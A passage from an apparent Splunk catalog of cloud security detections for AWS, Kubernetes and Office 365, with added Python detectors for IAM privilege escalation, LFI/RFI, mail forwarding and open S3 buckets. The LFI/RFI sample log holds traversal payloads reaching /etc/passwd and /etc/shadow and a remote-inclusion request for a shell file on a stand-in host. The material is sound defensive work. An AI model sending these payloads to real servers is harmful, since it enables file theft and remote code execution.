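The record above is the shape the role-owning account sees in its own trail (`recipientAccountId` is the target), which is why the caller's account has to be read from `userIdentity` rather than from the trail itself. In practice the baseline would be built from a look-back window rather than hard-coded.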

Kill Chain Phase

  • Lateral Movement


Reference


version: 1


Aws iam privilege escalation

This analytic story contains detections that query your AWS CloudTrail logs for activities related to privilege escalation.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2021-03-08
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
AWS Create Policy Version to allow all resources | T1078.004, T1136.003, T1580, T1110, T1098, T1069.003 | Cloud Accounts, Cloud Account, Cloud Infrastructure Discovery, Brute Force, Account Manipulation, Cloud Groups | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Discovery, Credential Access | TTP
AWS CreateAccessKey | T1136.003 | Cloud Account | Persistence | Hunting
AWS CreateLoginProfile | T1136.003 | Cloud Account | Persistence | TTP
AWS IAM Assume Role Policy Brute Force | T1580, T1110 | Cloud Infrastructure Discovery, Brute Force | Discovery, Credential Access | TTP
AWS IAM Delete Policy | T1098 | Account Manipulation | Persistence | Hunting
AWS IAM Failure Group Deletion | T1098 | Account Manipulation | Persistence | Anomaly
AWS IAM Successful Group Deletion | T1069.003, T1098 | Cloud Groups, Account Manipulation | Discovery, Persistence | Hunting
AWS SetDefaultPolicyVersion | T1078.004 | Cloud Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | TTP
AWS UpdateLoginProfile | T1136.003 | Cloud Account | Persistence | TTP
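Three of the detections above share one CloudTrail pattern: an IAM write whose parameters reveal the escalation. `CreatePolicyVersion` carries the new policy document (an `Allow` of `*` on `*` is the tell, and `setAsDefault` makes it live immediately), `SetDefaultPolicyVersion` flips to a previously staged version, and `CreateLoginProfile`/`UpdateLoginProfile` targeting a user other than the caller sets someone else's console password. The following added Python example shows the parsing and the checks; it is not Splunk content or an SPL search from the story, and the user names, policy ARNs and records are constructed.

```python
"""Added example (not Splunk content): three IAM privilege-escalation signals from
CloudTrail: CreatePolicyVersion whose document allows "*" on "*", SetDefaultPolicyVersion,
and Create/UpdateLoginProfile aimed at a user other than the caller.

Assumptions (not from the page): user names, policy ARNs and the sample records are
constructed; the page's detections are SPL, this is a stand-alone illustration."""
import json
from urllib.parse import unquote


def _as_list(value):
    return [value] if isinstance(value, str) else list(value or [])


def policy_allows_everything(doc_text):
    """True if any Allow statement grants '*' (or 'iam:*') on resource '*'.
    CloudTrail carries policyDocument as a JSON string, sometimes URL-encoded."""
    try:
        doc = json.loads(unquote(doc_text))
    except (ValueError, TypeError):
        return False
    statements = doc.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        resources = set(_as_list(stmt.get("Resource")))
        if actions & {"*", "iam:*"} and "*" in resources:
            return True
    return False


def detect_iam_privilege_escalation(lines):
    findings = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("eventSource") != "iam.amazonaws.com" or ev.get("errorCode"):
            continue
        name = ev.get("eventName")
        params = ev.get("requestParameters") or {}
        identity = ev.get("userIdentity") or {}
        actor = identity.get("userName") or identity.get("arn")
        if name == "CreatePolicyVersion" and policy_allows_everything(params.get("policyDocument", "")):
            findings.append({"signal": "policy_version_allows_all", "actor": actor,
                             "policy_arn": params.get("policyArn"),
                             "set_as_default": bool(params.get("setAsDefault"))})
        elif name == "SetDefaultPolicyVersion":
            findings.append({"signal": "set_default_policy_version", "actor": actor,
                             "policy_arn": params.get("policyArn"), "version": params.get("versionId")})
        elif name in ("CreateLoginProfile", "UpdateLoginProfile"):
            target = params.get("userName")
            if target and target != identity.get("userName"):
                findings.append({"signal": "login_profile_for_other_user", "actor": actor,
                                 "target_user": target, "event": name})
    return findings


def _event(name, user, params):
    """Constructed CloudTrail IAM record (not real log data)."""
    return json.dumps({"eventSource": "iam.amazonaws.com", "eventName": name,
                       "userIdentity": {"type": "IAMUser", "userName": user,
                                        "arn": f"arn:aws:iam::111111111111:user/{user}"},
                       "requestParameters": params})


ALLOW_ALL = {"Version": "2012-10-17",
             "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
READ_ONLY = {"Version": "2012-10-17",
             "Statement": [{"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::logs/*"}]}
POLICY_ARN = "arn:aws:iam::111111111111:policy/AppPolicy"

SAMPLE_EVENTS = [
    _event("CreatePolicyVersion", "alice", {"policyArn": POLICY_ARN, "policyDocument": json.dumps(ALLOW_ALL),
                                             "setAsDefault": True}),
    _event("CreatePolicyVersion", "alice", {"policyArn": POLICY_ARN, "policyDocument": json.dumps(READ_ONLY),
                                             "setAsDefault": False}),
    _event("CreateLoginProfile", "alice", {"userName": "bob", "passwordResetRequired": False}),
    _event("UpdateLoginProfile", "alice", {"userName": "alice"}),
    _event("SetDefaultPolicyVersion", "alice", {"policyArn": POLICY_ARN, "versionId": "v3"}),
]

if __name__ == "__main__":
    for finding in detect_iam_privilege_escalation(SAMPLE_EVENTS):
        print(finding)
```

A `SetDefaultPolicyVersion` is only dangerous when the version it activates is broader than the current one, so a production version of this would join against the earlier `CreatePolicyVersion` for the same ARN and version ID; the hunting-grade rule above flags every switch and leaves that triage to the analyst.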

Kill Chain Phase

  • Actions on Objectives
  • Reconnaissance


Reference


version: 1


Aws network acl activity

Monitor your AWS network infrastructure for bad configurations and malicious activity. Investigative searches help you probe deeper, when the facts warrant it.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-05-21
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
AWS Network Access Control List Created with All Open Ports | T1562.007 | Disable or Modify Cloud Firewall | Defense Evasion | TTP
AWS Network Access Control List Deleted | T1562.007 | Disable or Modify Cloud Firewall | Defense Evasion | Anomaly
Detect Spike in blocked Outbound Traffic from your AWS | - | - | - | Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Reference


version: 2


Aws security hub alerts

This story is focused on detecting alerts generated by AWS Security Hub.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-08-04
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Detect Spike in AWS Security Hub Alerts for EC2 Instance | - | - | - | Anomaly
Detect Spike in AWS Security Hub Alerts for User | - | - | - | Anomaly

Kill Chain Phase

Reference


version: 1


Aws user monitoring

Detect and investigate dormant user accounts for your AWS environment that have become active again. Because inactive and ad-hoc accounts are common attack targets, it's critical to enable governance within your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-03-12
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
AWS Excessive Security Scanning | T1526 | Cloud Service Discovery | Discovery | TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Cloud cryptomining

Monitor your cloud compute instances for activities related to cryptojacking/cryptomining. New instances that originate from previously unseen regions, users who launch abnormally high numbers of instances, or compute instances started by previously unseen users are just a few examples of potentially malicious behavior.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Change
  • Last Updated: 2019-10-02
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Abnormally High Number Of Cloud Instances Launched | T1078.004, T1535 | Cloud Accounts, Unused/Unsupported Cloud Regions | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Cloud Compute Instance Created By Previously Unseen User | T1078.004 | Cloud Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Anomaly
Cloud Compute Instance Created In Previously Unused Region | T1535 | Unused/Unsupported Cloud Regions | Defense Evasion | Anomaly
Cloud Compute Instance Created With Previously Unseen Image | - | - | - | Anomaly
Cloud Compute Instance Created With Previously Unseen Instance Type | - | - | - | Anomaly

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Cloud federated credential abuse

This analytic story addresses events that indicate abuse of cloud federated credentials. These credentials are usually extracted from endpoint desktops or servers, especially servers that provide federation services such as Windows Active Directory Federation Services (AD FS). Identity federation relies on objects such as OAuth2 tokens, cookies or SAML assertions to provide seamless access between cloud and on-premises environments. If these objects are hijacked or forged, attackers can pivot into the victim's cloud environments.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-26
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
AWS SAML Access by Provider User and Principal | T1078, T1003.001, T1136.003, T1556, T1546.012 | Valid Accounts, LSASS Memory, Cloud Account, Modify Authentication Process, Image File Execution Options Injection | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Credential Access | Anomaly
AWS SAML Update identity provider | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | TTP
Certutil exe certificate extraction | - | - | - | TTP
Detect Mimikatz Using Loaded Images | T1003.001 | LSASS Memory | Credential Access | TTP
Detect Rare Executables | - | - | - | Anomaly
O365 Add App Role Assignment Grant User | T1136.003 | Cloud Account | Persistence | TTP
O365 Added Service Principal | T1136.003 | Cloud Account | Persistence | TTP
O365 Excessive SSO logon errors | T1556 | Modify Authentication Process | Credential Access, Defense Evasion, Persistence | Anomaly
O365 New Federated Domain Added | T1136.003 | Cloud Account | Persistence | TTP
Registry Keys Used For Privilege Escalation | T1546.012 | Image File Execution Options Injection | Privilege Escalation, Persistence | TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Installation


Reference


version: 1


Container implantation monitoring and investigation

Use the searches in this story to monitor your container registries for the upload and deployment of potentially vulnerable, backdoored or implanted container images. These searches provide information on source users, destination paths, container names and repository names. They provide context to address MITRE ATT&CK T1525 (Implant Internal Image), which covers the upload of implanted containers to a company's repository in Amazon Elastic Container Registry, Google Container Registry or Azure Container Registry.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-02-20
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
New container uploaded to AWS ECR | T1525 | Implant Internal Image | Persistence | Hunting

Kill Chain Phase

Reference


version: 1


Dev sec ops

This story is focused on detecting attacks on the DevSecOps lifecycle, which consists of the phases plan, code, build, test, release, deploy, operate and monitor.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud, Dev Sec Ops Analytics
  • Datamodel:
  • Last Updated: 2021-08-18
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
AWS ECR Container Scanning Findings High | T1204.003, T1554, T1195.001, T1212, T1526 | Malicious Image, Compromise Client Software Binary, Compromise Software Dependencies and Development Tools, Exploitation for Credential Access, Cloud Service Discovery | Execution, Persistence, Initial Access, Credential Access, Discovery | TTP
AWS ECR Container Scanning Findings Low Informational Unknown | T1204.003 | Malicious Image | Execution | Hunting
AWS ECR Container Scanning Findings Medium | T1204.003 | Malicious Image | Execution | Anomaly
AWS ECR Container Upload Outside Business Hours | T1204.003 | Malicious Image | Execution | Anomaly
AWS ECR Container Upload Unknown User | T1204.003 | Malicious Image | Execution | Anomaly
Circle CI Disable Security Job | T1554 | Compromise Client Software Binary | Persistence | Anomaly
Circle CI Disable Security Step | T1554 | Compromise Client Software Binary | Persistence | Anomaly
Correlation by Repository and Risk | T1204.003 | Malicious Image | Execution | Correlation
Correlation by User and Risk | T1204.003 | Malicious Image | Execution | Correlation
GitHub Dependabot Alert | T1195.001 | Compromise Software Dependencies and Development Tools | Initial Access | Anomaly
GitHub Pull Request from Unknown User | T1195.001 | Compromise Software Dependencies and Development Tools | Initial Access | Anomaly
Kubernetes Nginx Ingress LFI | T1212 | Exploitation for Credential Access | Credential Access | TTP
Kubernetes Nginx Ingress RFI | T1212 | Exploitation for Credential Access | Credential Access | TTP
Kubernetes Scanner Image Pulling | T1526 | Cloud Service Discovery | Discovery | TTP
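The two ingress detections above (Kubernetes Nginx Ingress LFI and RFI) work from the request line in ingress-nginx access logs: a local file inclusion attempt shows up as directory traversal in the path or a query value, a remote file inclusion as a URL scheme inside a query value, and both are routinely percent-encoded more than once to slip past naive filters. The block below is an added Python illustration of that detection, not Splunk content or one of the SPL searches in this story; it assumes the default ingress-nginx log format (which opens like the classic "combined" format), and the log lines, pod IPs and hostnames are constructed.

```python
"""Added example (not Splunk content): LFI/RFI detection over ingress-nginx access log
lines. The request target is percent-decoded until stable (double encoding is common),
then checked for directory traversal in the path or query values (LFI) and for URL
schemes in query values (RFI).

Assumptions (not from the page): default ingress-nginx log format; the log lines,
IPs and hostnames are constructed."""
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# ingress-nginx's default log format begins like the classic "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
REMOTE_SCHEME_RE = re.compile(r"^\s*(https?|ftps?|php|data|file|gopher|expect)://", re.I)
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "/var/run/secrets/kubernetes.io")

SAMPLE_LOG = """\
10.244.0.5 - - [20/Sep/2021:10:00:01 +0000] "GET /static/app.js HTTP/1.1" 200 512 "-" "Mozilla/5.0" 212 0.002 [default-web-80]
10.244.0.9 - - [20/Sep/2021:10:00:02 +0000] "GET /index.php?page=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1024 "-" "curl/7.68.0" 301 0.004 [default-web-80]
10.244.0.9 - - [20/Sep/2021:10:00:03 +0000] "GET /index.php?page=http://198.51.100.7/shell.txt HTTP/1.1" 404 153 "-" "curl/7.68.0" 290 0.001 [default-web-80]
10.244.0.9 - - [20/Sep/2021:10:00:04 +0000] "GET /images/..%252f..%252fetc%252fshadow HTTP/1.1" 400 157 "-" "python-requests/2.25" 250 0.001 [default-web-80]
10.244.0.7 - - [20/Sep/2021:10:00:05 +0000] "POST /api/login HTTP/1.1" 401 60 "-" "Mozilla/5.0" 380 0.010 [default-api-8080]
"""


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so %252e%252e reads as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_target(target):
    """Return 'lfi', 'rfi' or None for one raw request target."""
    decoded = fully_decode(target).replace("\\", "/")
    parts = urlsplit(decoded)
    if TRAVERSAL_RE.search(parts.path) or any(s in parts.path for s in SENSITIVE_FILES):
        return "lfi"
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if TRAVERSAL_RE.search(value) or any(s in value for s in SENSITIVE_FILES):
            return "lfi"
        if REMOTE_SCHEME_RE.match(value):
            return "rfi"
    return None


def scan_ingress_log(text):
    """Parse each access log line and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_target(m["target"])
        if kind:
            findings.append({"kind": kind, "client": m["ip"], "status": int(m["status"]), "target": m["target"]})
    return findings


if __name__ == "__main__":
    for finding in scan_ingress_log(SAMPLE_LOG):
        print(finding)
```

The HTTP status is kept in each finding on purpose: a traversal that returned 200 with a body deserves a different priority from one the application rejected with 400 or 404, which is the same split the TTP-grade searches in this story let an analyst make.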

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Gcp cross account activity

Track when a user assumes an IAM role in another GCP account to obtain cross-account access to services and resources in that account. Accessing new roles could be an indication of malicious activity.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-09-01
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
GCP Detect gcploit framework | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | TTP

Kill Chain Phase

  • Lateral Movement


Reference


version: 1


Kubernetes scanning activity

This story addresses detection of Kubernetes cluster fingerprinting scans and attacks, providing information on items such as source IP, user agent and cluster names.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-04-15
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Amazon EKS Kubernetes Pod scan detection | T1526 | Cloud Service Discovery | Discovery | Hunting
Amazon EKS Kubernetes cluster scan detection | T1526 | Cloud Service Discovery | Discovery | Hunting
GCP Kubernetes cluster pod scan detection | T1526 | Cloud Service Discovery | Discovery | Hunting

Kill Chain Phase

  • Reconnaissance


Reference


version: 1


Kubernetes sensitive object access activity

This story addresses detection and response for accounts accessing sensitive Kubernetes cluster objects such as ConfigMaps or Secrets, providing information on items such as user, group, object, namespace and authorization reason.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-05-20
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Kubernetes AWS detect suspicious kubectl calls | - | - | - | Hunting

Kill Chain Phase

  • Lateral Movement


Reference


version: 1


Office 365 detections

This story is focused on detecting attacks against Office 365.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-12-16
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
High Number of Login Failures from a single source | T1110.001, T1136.003, T1562.007, T1556, T1110, T1114, T1114.003, T1114.002 | Password Guessing, Cloud Account, Disable or Modify Cloud Firewall, Modify Authentication Process, Brute Force, Email Collection, Email Forwarding Rule, Remote Email Collection | Credential Access, Persistence, Defense Evasion, Collection | Anomaly
O365 Add App Role Assignment Grant User | T1136.003 | Cloud Account | Persistence | TTP
O365 Added Service Principal | T1136.003 | Cloud Account | Persistence | TTP
O365 Bypass MFA via Trusted IP | T1562.007 | Disable or Modify Cloud Firewall | Defense Evasion | TTP
O365 Disable MFA | T1556 | Modify Authentication Process | Credential Access, Defense Evasion, Persistence | TTP
O365 Excessive Authentication Failures Alert | T1110 | Brute Force | Credential Access | Anomaly
O365 Excessive SSO logon errors | T1556 | Modify Authentication Process | Credential Access, Defense Evasion, Persistence | Anomaly
O365 New Federated Domain Added | T1136.003 | Cloud Account | Persistence | TTP
O365 PST export alert | T1114 | Email Collection | Collection | TTP
O365 Suspicious Admin Email Forwarding | T1114.003 | Email Forwarding Rule | Collection | Anomaly
O365 Suspicious Rights Delegation | T1114.002 | Remote Email Collection | Collection | TTP
O365 Suspicious User Email Forwarding | T1114.003 | Email Forwarding Rule | Collection | Anomaly
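The two forwarding detections above (O365 Suspicious Admin Email Forwarding and O365 Suspicious User Email Forwarding) read the Exchange admin audit records in the Office 365 Management Activity feed: an administrator sets forwarding on a mailbox with `Set-Mailbox` (`ForwardingSmtpAddress` / `ForwardingAddress`), while a user, or an attacker holding the user's session, creates an inbox rule with `New-InboxRule` (`ForwardTo`, `ForwardAsAttachmentTo`, `RedirectTo`), often named "." and set to delete the original. The block below is an added Python illustration of extracting the forwarding targets and flagging external domains, not Splunk content or an SPL search from the story; the tenant domains, user names and records are constructed, and real `Identity` values may be canonical names rather than addresses.

```python
"""Added example (not Splunk content): external mail-forwarding detection over Office 365
Management Activity (Exchange admin audit) records, covering admin-set forwarding
(Set-Mailbox) and inbox rules (New-InboxRule / Set-InboxRule).

Assumptions (not from the page): the tenant domains, user names and records below are
constructed; real 'Identity' values may be canonical names rather than addresses."""
import re

ORG_DOMAINS = {"contoso.com", "contoso.onmicrosoft.com"}
FORWARDING_PARAMS = {"ForwardingSmtpAddress", "ForwardingAddress", "ForwardTo",
                     "ForwardAsAttachmentTo", "RedirectTo"}
WATCHED_OPERATIONS = {"Set-Mailbox", "New-InboxRule", "Set-InboxRule"}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Constructed audit records in the Management Activity API shape (Parameters is a Name/Value list).
SAMPLE_RECORDS = [
    {"Workload": "Exchange", "Operation": "Set-Mailbox", "UserId": "admin@contoso.com",
     "Parameters": [{"Name": "Identity", "Value": "bob@contoso.com"},
                    {"Name": "ForwardingSmtpAddress", "Value": "smtp:bob.backup@outlook.example"},
                    {"Name": "DeliverToMailboxAndForward", "Value": "True"}]},
    {"Workload": "Exchange", "Operation": "New-InboxRule", "UserId": "alice@contoso.com",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "Alice Home [SMTP:alice.home@gmail.example]"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"Workload": "Exchange", "Operation": "Set-Mailbox", "UserId": "admin@contoso.com",
     "Parameters": [{"Name": "Identity", "Value": "carol@contoso.com"},
                    {"Name": "ForwardingAddress", "Value": "dan@contoso.com"}]},
    {"Workload": "AzureActiveDirectory", "Operation": "UserLoggedIn", "UserId": "alice@contoso.com"},
]


def forwarding_targets(params):
    """Extract every e-mail address from forwarding-related parameters."""
    targets = []
    for p in params:
        if p.get("Name") in FORWARDING_PARAMS:
            targets.extend(EMAIL_RE.findall(str(p.get("Value", ""))))
    return targets


def detect_external_forwarding(records, org_domains=ORG_DOMAINS):
    """One finding per watched operation that forwards mail to a domain outside the tenant."""
    findings = []
    for rec in records:
        if rec.get("Workload") != "Exchange" or rec.get("Operation") not in WATCHED_OPERATIONS:
            continue
        params = rec.get("Parameters") or []
        external = sorted({t for t in forwarding_targets(params)
                           if t.rsplit("@", 1)[-1].lower() not in org_domains})
        if not external:
            continue
        actor = rec.get("UserId", "")
        mailbox = next((p["Value"] for p in params if p.get("Name") == "Identity"), actor)
        findings.append({
            "operation": rec["Operation"],
            "actor": actor,
            "mailbox": mailbox,
            "external_targets": external,
            # Set-Mailbox on someone else's mailbox is the admin-forwarding case.
            "admin_set": rec["Operation"] == "Set-Mailbox" and actor.lower() != mailbox.lower(),
            "deletes_original": any(p.get("Name") == "DeleteMessage" and str(p.get("Value")).lower() == "true"
                                    for p in params),
        })
    return findings


if __name__ == "__main__":
    for finding in detect_external_forwarding(SAMPLE_RECORDS):
        print(finding)
```

Internal forwarding (the `carol` to `dan` record) is deliberately not flagged; what separates the admin and user stories is who the actor is relative to the mailbox, which is why the `admin_set` flag compares `UserId` with the `Identity` parameter instead of relying on the cmdlet name alone.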

Kill Chain Phase

  • Actions on Objectives
  • Not Applicable


Reference


version: 1


Suspicious aws login activities

Monitor your AWS authentication events using your CloudTrail logs. Searches within this Analytic Story will help you stay aware of and investigate suspicious logins.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Authentication
  • Last Updated: 2019-05-01
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Detect AWS Console Login by User from New City | T1535 | Unused/Unsupported Cloud Regions | Defense Evasion | Hunting
Detect AWS Console Login by User from New Country | T1535 | Unused/Unsupported Cloud Regions | Defense Evasion | Hunting
Detect AWS Console Login by User from New Region | T1535 | Unused/Unsupported Cloud Regions | Defense Evasion | Hunting

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious aws s3 activities

Use the searches in this Analytic Story to monitor your AWS S3 buckets for evidence of anomalous activity and suspicious behaviors, such as detecting open S3 buckets and buckets being accessed from a new IP. The contextual and investigative searches will give you more information, when required.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-07-24
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Detect New Open S3 Buckets over AWS CLI | T1530 | Data from Cloud Storage Object | Collection | TTP
Detect New Open S3 buckets | T1530 | Data from Cloud Storage Object | Collection | TTP
Detect S3 access from a new IP | T1530 | Data from Cloud Storage Object | Collection | Anomaly
Detect Spike in S3 Bucket deletion | T1530 | Data from Cloud Storage Object | Collection | Anomaly
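An "open" bucket in the two TTP detections above is one whose ACL grants the `AllUsers` or `AuthenticatedUsers` group (or a public canned ACL), recorded in CloudTrail as a `PutBucketAcl` request. A bucket policy can open the same door with `Principal: "*"` and no `Condition`, so a complete check reads `PutBucketPolicy` too. The block below is an added Python illustration of both checks, not Splunk content or an SPL search from this story; the bucket names, actor and records are constructed.

```python
"""Added example (not Splunk content): open-bucket detection over CloudTrail PutBucketAcl
and PutBucketPolicy records: public ACL grants (AllUsers / AuthenticatedUsers, or a public
canned ACL) and bucket policies that allow Principal "*" without any Condition.

Assumptions (not from the page): bucket names, the actor and the records are constructed."""
import json

PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
PUBLIC_CANNED_ACLS = {"public-read", "public-read-write", "authenticated-read"}


def public_acl_grants(params):
    """Return [(grantee, permission)] for every public grant in a PutBucketAcl request."""
    acl = ((params.get("AccessControlPolicy") or {}).get("AccessControlList") or {}).get("Grant") or []
    grants = acl if isinstance(acl, list) else [acl]
    public = []
    for g in grants:
        uri = (g.get("Grantee") or {}).get("URI")
        if uri in PUBLIC_GROUP_URIS:
            public.append((PUBLIC_GROUP_URIS[uri], g.get("Permission")))
    for canned in params.get("x-amz-acl") or []:  # canned ACL sent as a header
        if canned in PUBLIC_CANNED_ACLS:
            public.append(("canned:" + canned, "ACL"))
    return public


def _principal_is_everyone(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(params):
    """Return the actions of Allow statements open to everyone with no Condition."""
    policy = params.get("bucketPolicy")
    if isinstance(policy, str):
        try:
            policy = json.loads(policy)
        except ValueError:
            return []
    statements = (policy or {}).get("Statement", [])
    statements = statements if isinstance(statements, list) else [statements]
    open_actions = []
    for s in statements:
        if s.get("Effect") == "Allow" and _principal_is_everyone(s.get("Principal")) and not s.get("Condition"):
            action = s.get("Action", [])
            open_actions.extend([action] if isinstance(action, str) else action)
    return open_actions


def detect_open_buckets(lines):
    findings = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("eventSource") != "s3.amazonaws.com" or ev.get("errorCode"):
            continue
        params = ev.get("requestParameters") or {}
        bucket = params.get("bucketName")
        actor = (ev.get("userIdentity") or {}).get("arn")
        if ev.get("eventName") == "PutBucketAcl":
            grants = public_acl_grants(params)
            if grants:
                findings.append({"bucket": bucket, "actor": actor, "how": "acl", "grants": grants})
        elif ev.get("eventName") == "PutBucketPolicy":
            actions = public_policy_statements(params)
            if actions:
                findings.append({"bucket": bucket, "actor": actor, "how": "policy", "actions": actions})
    return findings


def _event(name, bucket, extra):
    """Constructed CloudTrail S3 record (not real log data)."""
    return json.dumps({"eventSource": "s3.amazonaws.com", "eventName": name,
                       "userIdentity": {"arn": "arn:aws:iam::111111111111:user/alice"},
                       "requestParameters": {"bucketName": bucket, **extra}})


SAMPLE_EVENTS = [
    _event("PutBucketAcl", "corp-backups", {"AccessControlPolicy": {"AccessControlList": {"Grant": [
        {"Grantee": {"xsi:type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"}]}}}),
    _event("PutBucketAcl", "corp-private", {"AccessControlPolicy": {"AccessControlList": {"Grant": [
        {"Grantee": {"xsi:type": "CanonicalUser", "ID": "abc123"}, "Permission": "FULL_CONTROL"}]}}}),
    _event("PutBucketPolicy", "corp-static", {"bucketPolicy": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::corp-static/*"}]}}),
    _event("PutBucketPolicy", "corp-internal", {"bucketPolicy": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::corp-internal/*",
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}}]}}),
]

if __name__ == "__main__":
    for finding in detect_open_buckets(SAMPLE_EVENTS):
        print(finding)
```

Treating any `Condition` as "not public" is a deliberate simplification: a condition on `aws:SourceVpce` or `aws:SourceIp` does close the bucket, but one on, say, `s3:prefix` does not, so a production rule would whitelist the narrowing condition keys rather than accept all of them.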

Kill Chain Phase

  • Actions on Objectives


Reference


version: 2


Suspicious aws traffic

Leverage these searches to monitor your AWS network traffic for evidence of anomalous activity and suspicious behaviors, such as a spike in blocked outbound traffic in your virtual private cloud (VPC).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-05-07
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Detect Spike in blocked Outbound Traffic from your AWS | - | - | - | Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Reference


version: 1


Suspicious cloud authentication activities

Monitor your cloud authentication events. Searches within this Analytic Story leverage the recent cloud updates to the Authentication data model to help you stay aware of and investigate suspicious login activity.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Authentication
  • Last Updated: 2020-06-04
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
AWS Cross Account Activity From Previously Unseen Account | - | - | - | Anomaly
Detect AWS Console Login by New User | - | - | - | Hunting
Detect AWS Console Login by User from New City | T1535 | Unused/Unsupported Cloud Regions | Defense Evasion | Hunting
